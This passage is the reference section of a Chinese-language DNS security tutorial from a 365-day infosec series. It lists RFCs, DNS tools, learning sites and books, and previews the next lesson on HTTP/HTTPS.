Domain Names Implementation and Specification - RFC 2181 - Clarifications to the DNS Specification - RFC 4033-4035 - DNSSEC Protocol - RFC 7858 - DNS over TLS - RFC 8484 - DNS over HTTPS ### 工具资源 - [dnsrecon](https://github.com/darkoperator/dnsrecon) - [dnscat2](https://github.com/iagox86/dnscat2) - [DNSViz](http://dnsviz.net/) - [Wireshark DNS Filters](https://wiki.wireshark.org/DNS) ### 在线资源 - [ICANN DNS 资源](https://www.icann.org/resources/pages/dns-2014-06-10-en) - [DNSSEC 部署指南](https://www.internetsociety.org/deploy360/dnssec/) - [Cloudflare DNS 学习中心](https://www.cloudflare.com/learning/dns/) ### 书籍推荐 - 《DNS and BIND》- Cricket Liu - 《DNS Security》- Amir Hassan - 《网络协议分析》- 多种中文教材 --- **标记 明日预告**:Day 03 - HTTP/HTTPS 协议深度解析 > 本文内容仅供学习和研究使用,请勿用于非法目的。所有实验请在隔离环境中进行。 --- *本文是 365 天信息安全技术系列的第 2 篇,完整系列请访问项目仓库。*
myh0st
2026年4月13日 23:13
分享文档
收藏文档
上一篇
下一篇
微信扫一扫
复制链接
手机扫一扫进行分享
复制链接
Markdown文件
分享
链接
类型
密码
更新密码